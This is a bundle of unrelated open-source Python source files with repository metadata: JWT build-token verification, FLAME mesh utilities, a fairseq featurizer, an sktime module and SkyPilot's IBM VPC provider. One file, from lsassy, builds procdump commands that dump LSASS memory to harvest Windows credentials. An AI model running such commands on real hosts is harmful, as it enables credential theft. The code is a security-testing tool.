"description": "The number of seconds until the job expires",
},
},
}
class InvalidBuildTokenException(Exception):
pass
def build_token(aud, token_type, build_id, job_id, expiration, instance_keys):
"""Returns an encoded JWT for the given build, signed by the local instance's private."""
token_data = {
"token_type": token_type,
"build_id": build_id,
"job_id": job_id,
"expiration": expiration,
}
token = generate_bearer_token(aud, ANONYMOUS_SUB, token_data, {}, expiration, instance_keys)
return token
def verify_build_token(token, aud, token_type, instance_keys):
"""Verify the JWT build token."""
try:
headers = jwt.get_unverified_header(token)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
kid = headers.get("kid", None)
if kid is None:
logger.error("Missing kid header on encoded JWT: %s", token)
raise InvalidBuildTokenException("Missing kid header")
public_key = instance_keys.get_service_key_public_key(kid)
if public_key is None:
logger.error("Could not find requested service key %s with encoded JWT: %s", kid, token)
raise InvalidBuildTokenException("Unknown service key")
try:
payload = jwtutil.decode(
token,
public_key,
verify=True,
algorithms=[ALGORITHM],
audience=aud,
issuer=instance_keys.service_name,
leeway=JWT_CLOCK_SKEW_SECONDS,
)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
if "sub" not in payload:
raise InvalidBuildTokenException("Missing sub field in JWT")
if payload["sub"] != ANONYMOUS_SUB:
raise InvalidBuildTokenException("Wrong sub field in JWT")
if (
"context" not in payload
or not payload["context"]["token_type"]
or not payload["context"]["build_id"]
or not payload["context"]["job_id"]
or not payload["context"]["expiration"]
):
raise InvalidBuildTokenException("Missing context field in JWT")
try:
jsonschema.validate(payload["context"], BUILD_TOKEN_CONTEXT_SCHEMA)
except jsonschema.ValidationError:
raise InvalidBuildTokenException(
"Unable to validate build token context schema: malformed context"
)
if payload["context"]["token_type"] != token_type:
raise InvalidBuildTokenException(
"Build token type in JWT does not match expected type: %s" % token_type
)
return payload
|
f0e49480c1d45e6eee586adfab11b138acbb47ea
|
136cf91ce80e12dde9bfc3f9d0c5940fe8a789bb
|
/fitting/measure.py
|
b56d48dd80e240e0c4b7fef64cb0913f4627efa6
|
[
"CC-BY-4.0"
] |
permissive
|
Rubikplayer/flame-fitting
|
e80087365cd21c2afbb053ef8013faba23a08a78
|
ca806ce13a8964231136bd226bf3255fc2e476de
|
refs/heads/master
| 2023-08-12T18:46:02.697078
| 2022-12-30T15:38:40
| 2022-12-30T15:38:40
| 111,953,122
| 601
| 109
| null | 2023-02-16T02:19:52
| 2017-11-24T20:23:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
measure.py
|
'''
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this computer program.
Using this computer program means that you agree to the terms in the LICENSE file (https://flame.is.tue.mpg.de/modellicense) included
with the FLAME model. Any use not explicitly granted by the LICENSE is prohibited.
Copyright 2020 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems. All rights reserved.
More information about FLAME is available at http://flame.is.tue.mpg.de.
For comments or questions, please email us at flame@tue.mpg.de
'''
import numpy as np
import matplotlib as mpl
import matplotlib.cm as cm
# -----------------------------------------------------------------------------
def mesh2mesh( mesh_v_1, mesh_v_2 ):
return dist = np.linalg.norm( mesh_v_2 - mesh_v_1, axis=1 )
# -----------------------------------------------------------------------------
def distance2color( dist, vmin=0, vmax=0.001, cmap_name='jet' ):
# vmin, vmax in meters
norm = mpl.colors.Normalize( vmin=vmin, vmax=vmax )
cmap = cm.get_cmap( name=cmap_name )
colormapper = cm.ScalarMappable( norm=norm, cmap=cmap )
rgba = colormapper.to_rgba( dist )
color_3d = rgba[:,0:3]
return color_3d
|
4a4bd5ff67b669d9ad56778b06644fcdd52bc1e4
|
3ea12bf1031313a823de4e02e008d9e98eeaadfa
|
/lsassy/dumpmethod/procdump.py
|
29362be5c87305a4bc38d7c2ff5fac85f893cfeb
|
[
"MIT"
] |
permissive
|
Hackndo/lsassy
|
85ef24b9a32a7eb428f338a839ed8504d0739695
|
4b1ddf1b3491b014aa27a68f3aa26cb0c962b0a5
|
refs/heads/master
| 2023-08-23T02:10:16.789757
| 2023-06-30T20:06:09
| 2023-06-30T20:06:09
| 225,634,372
| 1,700
| 215
|
MIT
| 2023-06-22T18:42:56
| 2019-12-03T14:03:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,158
|
py
|
procdump.py
|
from lsassy.dumpmethod import IDumpMethod, Dependency
class DumpMethod(IDumpMethod):
custom_dump_ext_support = False
dump_ext = "dmp"
def __init__(self, session, timeout, time_between_commands):
super().__init__(session, timeout, time_between_commands)
self.procdump = Dependency("procdump", "procdump.exe")
def prepare(self, options):
return self.prepare_dependencies(options, [self.procdump])
def clean(self):
self.clean_dependencies([self.procdump])
def get_commands(self, dump_path=None, dump_name=None, no_powershell=False):
cmd_command = """for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do {} -accepteula -o -ma %J {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
pwsh_command = """{} -accepteula -o -ma (Get-Process lsass).Id {}{}""".format(
self.procdump.get_remote_path(),
self.dump_path, self.dump_name
)
return {
"cmd": cmd_command,
"pwsh": pwsh_command
}
|
62c648bb9667561e01d88372cfe4f5f2d1704ff4
|
fb1e852da0a026fb59c8cb24aeb40e62005501f1
|
/edgelm/examples/wav2vec/vq-wav2vec_featurize.py
|
7b025f18b5b13eb562e904a5cfd9e31cb934f02d
|
[
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
microsoft/unilm
|
134aa44867c5ed36222220d3f4fd9616d02db573
|
b60c741f746877293bb85eed6806736fc8fa0ffd
|
refs/heads/master
| 2023-08-31T04:09:05.779071
| 2023-08-29T14:07:57
| 2023-08-29T14:07:57
| 198,350,484
| 15,313
| 2,192
|
MIT
| 2023-08-19T11:33:20
| 2019-07-23T04:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,930
|
py
|
vq-wav2vec_featurize.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Helper script to pre-compute embeddings for a flashlight (previously called wav2letter++) dataset
"""
import argparse
import glob
import os
import os.path as osp
import pprint
import soundfile as sf
import torch
import fairseq
from torch import nn
from torch.utils.data import DataLoader
try:
import tqdm
except:
print("Install tqdm to use --log-format=tqdm")
class FilesDataset:
def __init__(self, files, labels):
self.files = files
if labels and osp.exists(labels):
with open(labels, "r") as lbl_f:
self.labels = [line.rstrip() for line in lbl_f]
else:
self.labels = labels
def __len__(self):
return len(self.files)
def __getitem__(self, index):
fname = self.files[index]
wav, sr = sf.read(fname)
assert sr == 16000
wav = torch.from_numpy(wav).float()
lbls = None
if self.labels:
if isinstance(self.labels, str):
lbl_file = osp.splitext(fname)[0] + "." + self.labels
with open(lbl_file, "r") as lblf:
lbls = lblf.readline()
assert lbls is not None
else:
lbls = self.labels[index]
return wav, lbls
def collate(self, batch):
return batch
class ArgTypes:
@staticmethod
def existing_path(arg):
arg = str(arg)
assert osp.exists(arg), f"File {arg} does not exist"
return arg
@staticmethod
def mkdir(arg):
arg = str(arg)
os.makedirs(arg, exist_ok=True)
return arg
class DatasetWriter:
def __init__(self):
self.args = self.load_config()
pprint.pprint(self.args.__dict__)
self.model = self.load_model()
def __getattr__(self, attr):
return getattr(self.args, attr)
def read_manifest(self, fname):
with open(fname, "r") as fp:
lines = fp.read().split("\n")
root = lines.pop(0).strip()
fnames = [
osp.join(root, line.split("\t")[0]) for line in lines if len(line) > 0
]
return fnames
def process_splits(self):
if self.args.shard is not None or self.args.num_shards is not None:
assert self.args.shard is not None and self.args.num_shards is not None
for split in self.splits:
print(split)
if self.extension == "tsv":
datadir = osp.join(self.data_dir, f"{split}.{self.extension}")
print("Reading manifest file: ", datadir)
files = self.read_manifest(datadir)
else:
datadir = osp.join(self.data_dir, split, f"**/*.{self.extension}")
files = glob.glob(datadir, recursive=True)
assert len(files) > 0
if self.args.shard is not None:
files = files[self.args.shard :: self.args.num_shards]
lbls = []
with open(self.data_file(split), "w") as srcf:
for line, lbl in self.iterate(files):
print(line, file=srcf)
if self.args.labels:
lbls.append(lbl + "\n")
if self.args.labels:
assert all(a is not None for a in lbls)
with open(self.lbl_file(split), "w") as lblf:
lblf.writelines(lbls)
def iterate(self, files):
data = self.load_data(files)
for samples in tqdm.tqdm(data, total=len(files) // 32):
for wav, lbl in samples:
x = wav.unsqueeze(0).float().cuda()
div = 1
while x.size(-1) // div > self.args.max_size:
div += 1
xs = x.chunk(div, dim=-1)
result = []
for x in xs:
torch.cuda.empty_cache()
x = self.model.feature_extractor(x)
if self.quantize_location == "encoder":
with torch.no_grad():
_, idx = self.model.vector_quantizer.forward_idx(x)
idx = idx.squeeze(0).cpu()
else:
with torch.no_grad():
z = self.model.feature_aggregator(x)
_, idx = self.model.vector_quantizer.forward_idx(z)
idx = idx.squeeze(0).cpu()
result.append(idx)
idx = torch.cat(result, dim=0)
yield " ".join("-".join(map(str, a.tolist())) for a in idx), lbl
def lbl_file(self, name):
shard_part = "" if self.args.shard is None else f".{self.args.shard}"
return osp.join(self.output_dir, f"{name}.lbl{shard_part}")
def data_file(self, name):
shard_part = "" if self.args.shard is None else f".{self.args.shard}"
return osp.join(self.output_dir, f"{name}.src{shard_part}")
def var_file(self):
return osp.join(self.output_dir, f"vars.pt")
def load_config(self):
parser = argparse.ArgumentParser("Vector Quantized wav2vec features")
# Model Arguments
parser.add_argument("--checkpoint", type=ArgTypes.existing_path, required=True)
parser.add_argument("--data-parallel", action="store_true")
# Output Arguments
parser.add_argument("--output-dir", type=ArgTypes.mkdir, required=True)
# Data Arguments
parser.add_argument("--data-dir", type=ArgTypes.existing_path, required=True)
parser.add_argument("--splits", type=str, nargs="+", required=True)
parser.add_argument("--extension", type=str, required=True)
parser.add_argument("--labels", type=str, required=False)
parser.add_argument("--shard", type=int, default=None)
parser.add_argument("--num-shards", type=int, default=None)
parser.add_argument("--max-size", type=int, default=1300000)
# Logger Arguments
parser.add_argument(
"--log-format", type=str, choices=["none", "simple", "tqdm"]
)
return parser.parse_args()
def load_data(self, fnames):
dataset = FilesDataset(fnames, self.args.labels)
loader = DataLoader(
dataset, batch_size=32, collate_fn=dataset.collate, num_workers=8
)
return loader
def load_model(self):
model, cfg, task = fairseq.checkpoint_utils.load_model_ensemble_and_task([self.checkpoint])
model = model[0]
self.quantize_location = getattr(cfg.model, "vq", "encoder")
model.eval().float()
model.cuda()
if self.data_parallel:
model = nn.DataParallel(model)
return model
def __call__(self):
self.process_splits()
if hasattr(self.model.feature_extractor, "vars") and (
self.args.shard is None or self.args.shard == 0
):
vars = (
self.model.feature_extractor.vars.view(
self.model.feature_extractor.banks,
self.model.feature_extractor.num_vars,
-1,
)
.cpu()
.detach()
)
print("writing learned latent variable embeddings: ", vars.shape)
torch.save(vars, self.var_file())
if __name__ == "__main__":
write_data = DatasetWriter()
write_data()
print("Done.")
|
605f520e29fe21f8f8c5f51a1cb7fa4671056bea
|
b347bc4b850dee4a8a9a171b563a3f31230ce1c7
|
/sktime/transformations/series/detrend/__init__.py
|
875d1041766b230516709cb3fc36e97ce6a36da3
|
[
"BSD-3-Clause"
] |
permissive
|
sktime/sktime
|
5963962df338c5931a2f9f1794d1203c50ddc27e
|
70b2bfaaa597eb31bc3a1032366dcc0e1f4c8a9f
|
refs/heads/main
| 2023-08-22T18:20:08.022950
| 2023-08-22T15:24:39
| 2023-08-22T15:24:39
| 156,401,841
| 1,117
| 268
|
BSD-3-Clause
| 2023-09-14T20:44:21
| 2018-11-06T15:08:24
|
Python
|
UTF-8
|
Python
| false
| false
| 490
|
py
|
__init__.py
|
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Transformer module for detrending and deseasonalization."""
__author__ = ["mloning", "eyalshafran", "SveaMeyer13"]
__all__ = ["Detrender", "Deseasonalizer", "ConditionalDeseasonalizer", "STLTransformer"]
from sktime.transformations.series.detrend._deseasonalize import (
ConditionalDeseasonalizer,
Deseasonalizer,
STLTransformer,
)
from sktime.transformations.series.detrend._detrend import Detrender
|
557b2156663048e0c0e77d63bf19f245dad82fcf
|
fad4aa5a174627b8930beb8f5f987dd62c88957e
|
/sky/skylet/providers/ibm/vpc_provider.py
|
6d691b765f790293820d514d7c1ad0cff62cf162
|
[
"Apache-2.0"
] |
permissive
|
skypilot-org/skypilot
|
603e29ecb3ce3b25d308f018fd402488ee352ef0
|
e58f33f315ca08c6e057ab9a2d00cd27476529a1
|
refs/heads/master
| 2023-08-16T21:46:53.379586
| 2023-08-16T02:17:21
| 2023-08-16T02:17:21
| 395,140,743
| 3,416
| 220
|
Apache-2.0
| 2023-09-14T21:20:44
| 2021-08-11T23:32:15
|
Python
|
UTF-8
|
Python
| false
| false
| 34,630
|
py
|
vpc_provider.py
|
"""
module allocating VPC - network namespace and configuration
for Ray's cluster. used by the node_provider module to group the
nodes under the same subnet, tagged by the same cluster name.
"""
import copy
import json
import textwrap
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
import requests
from sky.adaptors import ibm
from sky.skylet.providers.ibm.utils import RAY_RECYCLABLE, get_logger
# pylint: disable=line-too-long
logger = get_logger("vpc_provider_")
REQUIRED_RULES = {
"outbound_tcp_all": "selected security group is missing rule permitting outbound TCP access\n",
"outbound_udp_all": "selected security group is missing rule permitting outbound UDP access\n",
"inbound_tcp_sg": "selected security group is missing rule permitting inbound tcp traffic inside selected security group\n",
"inbound_tcp_22": "selected security group is missing rule permitting inbound traffic to tcp port 22 required for ssh\n",
}
INSECURE_RULES = {
"inbound_tcp_6379": "selected security group is missing rule permitting inbound traffic to tcp port 6379 required for Redis\n",
"inbound_tcp_8265": "selected security group is missing rule permitting inbound traffic to tcp port 8265 required to access Ray Dashboard\n",
}
REQUIRED_RULES.update(INSECURE_RULES)
class IBMVPCProvider:
"""
Manages a vpc containing the network configuration for the cluster's nodes.
"""
def __init__(self, resource_group_id, region, cluster_name):
self.vpc_client = ibm.client(region=region)
self.search_client = ibm.search_client()
self.tagging_client = ibm.tagging_client()
self.resource_group_id = resource_group_id
self.cluster_name = cluster_name
## region and zone might change between failovers
self.region = None
self.zone = None
def create_or_fetch_vpc(self, region, zone):
"""
returns a cluster with tag matching the cluster name if exists, else creates one.
an entry point (out of 2) to this module.
"""
# refresh client region scope if region changed.
if self.region and self.region != region:
self.vpc_client = ibm.client(region=region)
self.region = region
self.zone = zone
reused_vpc_data = None
# pylint: disable=line-too-long
vpcs_filtered_by_tags_and_region = self.search_client.search(
query=f"type:vpc AND tags:{self.cluster_name} AND region:{self.region}",
fields=["tags", "region", "type"],
limit=1000,
).get_result()["items"]
for vpc in vpcs_filtered_by_tags_and_region:
vpc_id = vpc["crn"].rsplit(":", 1)[-1]
vpc_data = self.get_vpc_data(vpc_id, self.region)
if vpc_data["status"] == "available":
reused_vpc_data = vpc_data
break
# found vpc tagged with cluster name in the required region
if reused_vpc_data:
# using self.region since tagged vpc is in the same region
subnets = self.get_vpc_subnets(reused_vpc_data, self.region)
subnet_in_zone = next(
(subnet for subnet in subnets if subnet["zone"]["name"] == self.zone),
None,
)
# found a subnet in the required zone
if subnet_in_zone:
subnet_id = subnet_in_zone["id"]
public_gateway = subnet_in_zone.get("public_gateway")
if not public_gateway:
public_gateway = self.create_public_gateway(
reused_vpc_data["id"], self.zone, subnet_in_zone
)
# tagged vpc found doesn't have a subnet in the required zone
else:
subnet_data = self.create_subnet(reused_vpc_data["id"], self.zone)
subnet_id = subnet_data["id"]
public_gateway = self.create_public_gateway(
reused_vpc_data["id"], self.zone, subnet_data
)
# add missing security group rules if needed
security_group = reused_vpc_data.get("default_security_group")
if security_group:
sg_id = security_group["id"]
self.add_missing_sg_rules(sg_id)
# managed to reuse found VPC
logger.info(
f"Reusing VPC {reused_vpc_data['id']} named: {reused_vpc_data['name']}"
)
return {
"vpc_id": reused_vpc_data["id"],
"subnet_id": subnet_id,
"security_group_id": sg_id,
}
# delete a tagged vpc that doesn't meet requirements
if reused_vpc_data:
self.delete_vpc(reused_vpc_data["id"], self.region)
# create a new vpc
vpc_tags = self.create_vpc()
return vpc_tags
def create_vpc(self):
"""creates a vpc, tags it and return key values pertaining it.
uuid is added to vpc name to avoid naming collision.
vpc is tagged using the exact cluster name, as appears on
the cluster's config file.
Returns:
dict: containing the keys: vpc_id, subnet_id
and security_group_id
"""
vpc_data = self.vpc_client.create_vpc(
address_prefix_management="auto",
classic_access=False,
name=f"sky-vpc-{self.cluster_name}-{str(uuid.uuid4())[:5]}",
resource_group={"id": self.resource_group_id},
).get_result()
subnet_data = self.create_subnet(vpc_data["id"], self.zone)
self.create_public_gateway(vpc_data["id"], self.zone, subnet_data)
sg_id = self.create_sg_rules(vpc_data)
# tag vpc with the cluster's name
resource_model = {"resource_id": vpc_data["crn"]}
self.tagging_client.attach_tag(
resources=[resource_model], tag_names=[self.cluster_name], tag_type="user"
).get_result()
return {
"vpc_id": vpc_data["id"],
"subnet_id": subnet_data["id"],
"security_group_id": sg_id,
}
def create_subnet(self, vpc_id, zone_name):
ipv4_cidr_block = None
subnet_name = f"sky-subnet-{self.cluster_name}-{str(uuid.uuid4())[:5]}"
res = self.vpc_client.list_vpc_address_prefixes(vpc_id).get_result()
# searching for the CIDR block (internal ip range) matching the
# specified zone of a VPC (whose region has already been set)
address_prefixes = res["address_prefixes"]
ipv4_cidr_block = next(
(
address_prefix["cidr"]
for address_prefix in address_prefixes
if address_prefix["zone"]["name"] == zone_name
),
None,
)
if not ipv4_cidr_block:
raise Exception(
"Failed to locate a cidr block "
f"Matching the zone name: {zone_name} to create "
"a subnet"
)
subnet_prototype = {}
subnet_prototype["zone"] = {"name": zone_name}
subnet_prototype["ip_version"] = "ipv4"
subnet_prototype["name"] = subnet_name
subnet_prototype["resource_group"] = {"id": self.resource_group_id}
subnet_prototype["vpc"] = {"id": vpc_id}
subnet_prototype["ipv4_cidr_block"] = ipv4_cidr_block
subnet_data = self.vpc_client.create_subnet(subnet_prototype).get_result()
return subnet_data
def create_public_gateway(self, vpc_id, zone_name, subnet_data):
gateway_prototype = {}
gateway_prototype["vpc"] = {"id": vpc_id}
gateway_prototype["zone"] = {"name": zone_name}
gateway_prototype["name"] = f"{subnet_data['name']}-gw"
gateway_prototype["resource_group"] = {"id": self.resource_group_id}
gateway_data = self.vpc_client.create_public_gateway(
**gateway_prototype
).get_result()
gateway_id = gateway_data["id"]
self.vpc_client.set_subnet_public_gateway(subnet_data["id"], {"id": gateway_id})
return gateway_id
def create_sg_rules(self, vpc_data):
sg_id = vpc_data["default_security_group"]["id"]
sg_name = f"{self.cluster_name}-{str(uuid.uuid4())[:5]}-sg"
# update sg name
self.vpc_client.update_security_group(
sg_id, security_group_patch={"name": sg_name}
)
# open private tcp traffic between VSIs within the security group
sg_rule_prototype = _build_security_group_rule_prototype_model(
"inbound_tcp_sg", sg_id=sg_id
)
self.vpc_client.create_security_group_rule(
sg_id, sg_rule_prototype
).get_result()
# add all other required rules configured by the specific backend
for rule in REQUIRED_RULES.keys():
sg_rule_prototype = _build_security_group_rule_prototype_model(rule)
if sg_rule_prototype:
self.vpc_client.create_security_group_rule(
sg_id, sg_rule_prototype
).get_result()
return sg_id
def get_vpc_data(self, vpc_id, region):
"""returns vpc data if exists, else None"""
if not vpc_id:
return None
tmp_vpc_client = ibm.client(region=region)
try:
vpc_data = tmp_vpc_client.get_vpc(vpc_id).result
return vpc_data
except ibm.ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
logger.debug("VPC doesn't exist.")
return None
else:
raise
def get_vpc_subnets(self, vpc_data, region, field=""):
"""return data on subnets belonging to specified vpc within
the specified region.
if 'field' is specified narrowing data returned to
data['field'] (for each subnet)
Args:
vpc_data (str): vpc data as received from vpc client.
region (str): ibm vpc region.
field (str, optional): field within the subnet data response from vpc
client's list_subnets()/get_subnet() response. Defaults to ''.
Returns:
str: data on all subnets belonging to the specified vpc.
"""
if not vpc_data:
return None
# pylint: disable=line-too-long
tmp_vpc_client = ibm.client(region=region)
subnets_attached_to_routing_table = tmp_vpc_client.list_subnets(
routing_table_id=vpc_data["default_routing_table"]["id"]
).get_result()["subnets"]
if field:
return [subnet[field] for subnet in subnets_attached_to_routing_table]
else:
return subnets_attached_to_routing_table
def delete_vpc(self, vpc_id, region):
"""
deletes a vpc with the specified id and region.
an entry point to this module (alongside create_or_fetch_vpc)
"""
logger.debug(f"Deleting vpc: {vpc_id}")
tmp_vpc_client = ibm.client(region=region)
vpc_data = self.get_vpc_data(vpc_id, region)
if not vpc_data:
logger.warn(f"vpc:{vpc_id} is set for deletion, but wasn't found")
return None
self.delete_vms(tmp_vpc_client, vpc_id)
self.delete_subnets(tmp_vpc_client, vpc_data, region)
self.delete_gateways(tmp_vpc_client, vpc_id)
# at this point vpc was already verified to be existing
# thus no relevant exception to catch when deleting.
tmp_vpc_client.delete_vpc(vpc_id)
def delete_vms(self, vpc_client, vpc_id):
def _poll_vpc_contains_vms(vpc_id):
tries = 60
sleep_interval = 3
while tries:
# list_instances() never raise an exception, check values instead
res = vpc_client.list_instances(vpc_id=vpc_id).get_result()
if not res["total_count"]:
return True
else:
tries -= 1
time.sleep(sleep_interval)
raise Exception(
"Failed to delete VPC's instances within "
"the expected time frame. Cannot "
"continue to delete VPC."
)
def _del_instance(vm_data):
# first delete ips created by node_provider
nic_id = vm_data["network_interfaces"][0]["id"]
res = vpc_client.list_instance_network_interface_floating_ips(
vm_data["id"], nic_id
).get_result()
floating_ips = res.get("floating_ips", [])
for ip in floating_ips:
if ip["name"].startswith(RAY_RECYCLABLE):
logger.debug(f"Deleting IP: {ip['id']}")
vpc_client.delete_floating_ip(ip["id"])
logger.debug(f"Deleting VM: {vm_data['id']}")
vpc_client.delete_instance(id=vm_data["id"])
# pylint: disable=line-too-long E1136
res = vpc_client.list_instances(vpc_id=vpc_id).get_result()
num_instances = res["total_count"]
# Delete VSIs if exist
if num_instances:
instances = res["instances"]
with ThreadPoolExecutor(num_instances) as ex:
for i in range(num_instances):
ex.submit(_del_instance, instances[i])
# wait until all vms are deleted to proceed
_poll_vpc_contains_vms(vpc_id)
def delete_subnets(self, vpc_client, vpc_data, region):
def _poll_subnet_deleted(subnet_id):
tries = 10
sleep_interval = 2
while tries:
try:
vpc_client.get_subnet(subnet_id).get_result()
except ibm.ibm_cloud_sdk_core.ApiException:
logger.debug(f"Deleted subnet id: {subnet_id}")
return True
tries -= 1
time.sleep(sleep_interval)
logger.error("Failed to delete instance within the alloted time\n")
return False
for subnet_id in self.get_vpc_subnets(vpc_data, region, field="id"):
# get_result() used for synchronization
logger.debug(f"Deleting subnet: {subnet_id}")
vpc_client.delete_subnet(subnet_id).get_result()
_poll_subnet_deleted(subnet_id)
def delete_gateways(self, vpc_client, vpc_id):
"""deletes all gateways attached to the specified vpc"""
# pylint: disable=line-too-long
gateways = vpc_client.list_public_gateways(
resource_group_id=self.resource_group_id
).get_result()["public_gateways"]
gateways_ids_of_vpc = [
gateway["id"] for gateway in gateways if gateway["vpc"]["id"] == vpc_id
]
for gateway_id in gateways_ids_of_vpc:
# get_result() used for synchronization
logger.debug(f"Deleting gateway: {gateway_id}")
vpc_client.delete_public_gateway(gateway_id).get_result()
def add_missing_sg_rules(self, sec_group_id):
missing_rules = self.get_unsatisfied_security_group_rules(sec_group_id)
if missing_rules:
for val in missing_rules.values():
logger.debug(f"missing {val}")
for missing_rule in missing_rules.keys():
sg_rule_prototype = _build_security_group_rule_prototype_model(
missing_rule, sec_group_id
)
self.vpc_client.create_security_group_rule(
sec_group_id, sg_rule_prototype
).get_result()
def get_unsatisfied_security_group_rules(self, sg_id):
"""
returns unsatisfied security group rules.
"""
unsatisfied_rules = copy.deepcopy(REQUIRED_RULES)
sg = self.vpc_client.get_security_group(sg_id).get_result()
for rule in sg["rules"]:
# pylint: disable=line-too-long
# check outbound rules that are not associated with a specific IP address range
if rule["direction"] == "outbound" and rule["remote"] == {
"cidr_block": "0.0.0.0/0"
}:
if rule["protocol"] == "all":
# outbound is fine!
unsatisfied_rules.pop("outbound_tcp_all", None)
unsatisfied_rules.pop("outbound_udp_all", None)
elif rule["protocol"] == "tcp":
unsatisfied_rules.pop("outbound_tcp_all", None)
elif rule["protocol"] == "udp":
unsatisfied_rules.pop("outbound_udp_all", None)
# Check inbound rules
elif rule["direction"] == "inbound":
# check rules that are not associated with a specific IP address range
if rule["remote"] == {"cidr_block": "0.0.0.0/0"}:
# we interested only in all or tcp protocols
if rule["protocol"] == "all":
# there a rule permitting all traffic
unsatisfied_rules.pop("inbound_tcp_sg", None)
unsatisfied_rules.pop("inbound_tcp_22", None)
unsatisfied_rules.pop("inbound_tcp_6379", None)
unsatisfied_rules.pop("inbound_tcp_8265", None)
elif rule["protocol"] == "tcp":
if rule["port_min"] == 1 and rule["port_max"] == 65535:
# all ports are open
unsatisfied_rules.pop("inbound_tcp_sg", None)
unsatisfied_rules.pop("inbound_tcp_22", None)
unsatisfied_rules.pop("inbound_tcp_6379", None)
unsatisfied_rules.pop("inbound_tcp_8265", None)
else:
port_min = rule["port_min"]
port_max = rule["port_max"]
if port_min <= 22 and port_max >= 22:
unsatisfied_rules.pop("inbound_tcp_22", None)
elif port_min <= 6379 and port_max >= 6379:
unsatisfied_rules.pop("inbound_tcp_6379", None)
elif port_min <= 8265 and port_max >= 8265:
unsatisfied_rules.pop("inbound_tcp_8265", None)
# rule regards private traffic within the VSIs associated with the security group
elif rule["remote"].get("id") == sg["id"]:
# validate that inbound traffic inside group available
if rule["protocol"] == "all" or rule["protocol"] == "tcp":
unsatisfied_rules.pop("inbound_tcp_sg", None)
return unsatisfied_rules
def remote_cluster_removal(self, vpc_id, region):
"""deletes the vpc and its associated resources
using the FaaS service: ibm cloud functions.
Used only when cluster is set to be deleted
remotely, e.g. by `sky autostop --down`"""
cc = ClusterCleaner(self.resource_group_id, vpc_id, region)
cc.delete_cluster()
def _build_security_group_rule_prototype_model(missing_rule, sg_id=None):
direction, protocol, port = missing_rule.split("_")
remote = {"cidr_block": "0.0.0.0/0"}
try: # port number was specified
port = int(port)
port_min = port
port_max = port
# pylint: disable=W0703
except Exception:
port_min = 1
port_max = 65535
# only valid if security group already exists
if port == "sg":
if not sg_id:
return None
remote = {"id": sg_id}
return {
"direction": direction,
"ip_version": "ipv4",
"protocol": protocol,
"remote": remote,
"port_min": port_min,
"port_max": port_max,
}
class ClusterCleaner:
"""Responsible for deleting a cluster with all its associated
resources. Used when the remote cluster head is requested to
dismantle its cluster."""
# default region for the cloud function namespace
namespace_region = "us-east"
# default name for the cloud function namespace (cf doesn't support tagging)
namespace_name = "skypilot-namespace"
# default name for the cloud function action.
action_name = "skypilot-vpc-cleaner-action"
# url to cloud function's namespaces in the chosen region: `namespace_region`
cf_namespaces_url = (
f"https://{namespace_region}.functions.cloud.ibm.com/api/v1/namespaces"
)
def __init__(self, resource_group_id, vpc_id, vpc_region) -> None:
self.resource_group_id = resource_group_id
self.vpc_id = vpc_id
self.vpc_region = vpc_region
function_code = textwrap.dedent(
"""
import subprocess
import time
from concurrent.futures import ThreadPoolExecutor
RAY_RECYCLABLE = "ray-recyclable"
ibm_vpc_client = None
# modules installed and imported entry point
ibm_vpc = None
ibm_cloud_sdk_core = None
def get_vpc_data(vpc_id):
if not vpc_id: return None
try:
vpc_data = ibm_vpc_client.get_vpc(vpc_id).result
return vpc_data
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print(("VPC doesn't exist."))
return None
else: raise
def delete_subnets(vpc_data):
def _poll_subnet_exists(subnet_id):
tries = 30 # waits up to 5 min with 10 sec interval
sleep_interval = 10
while tries:
try:
subnet_data = ibm_vpc_client.get_subnet(subnet_id).result
except Exception:
print('Deleted subnet id: {}'.format(subnet_id))
return True
tries -= 1
time.sleep(sleep_interval)
print(f"Failed to delete instance within expected time frame of {tries*sleep_interval/60} minutes.")
return False
subnets_attached_to_routing_table = ibm_vpc_client.list_subnets(routing_table_id = vpc_data['default_routing_table']['id']).get_result()['subnets']
subnets_ids = [subnet['id'] for subnet in subnets_attached_to_routing_table]
for id in subnets_ids:
try:
ibm_vpc_client.delete_subnet(id).get_result()
_poll_subnet_exists(id)
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("subnet doesn't exist.")
def delete_gateways(vpc_id):
gateways = ibm_vpc_client.list_public_gateways(resource_group_id=RESOURCE_GROUP_ID).get_result()['public_gateways']
gateways_ids_of_vpc = [gateway['id'] for gateway in gateways if gateway['vpc']['id']== vpc_id]
for gateway_id in gateways_ids_of_vpc:
deleting_resource = True
while deleting_resource:
try:
ibm_vpc_client.delete_public_gateway(gateway_id).get_result()
deleting_resource = False
except ibm_cloud_sdk_core.ApiException as e:
if e.code == 404:
print("gateway doesn't exist.")
deleting_resource = False
if e.code == 409:
print("gateway still in use.")
# will retry until cloud functions timeout.
time.sleep(5)
def delete_vms(vpc_id):
def _poll_vpc_contains_vms(vpc_id):
tries = 60
sleep_interval = 3
while tries:
# list_instances() never raise an exception, check values instead
res = ibm_vpc_client.list_instances(vpc_id=vpc_id).get_result()
if not res["total_count"]:
return True
else:
tries -= 1
time.sleep(sleep_interval)
raise Exception(
"Failed to delete VPC's instances within "
"the expected time frame. Cannot "
"continue to delete VPC."
)
def _del_instance(vm_data):
# first delete ips created by node_provider
nic_id = vm_data["network_interfaces"][0]["id"]
res = ibm_vpc_client.list_instance_network_interface_floating_ips(
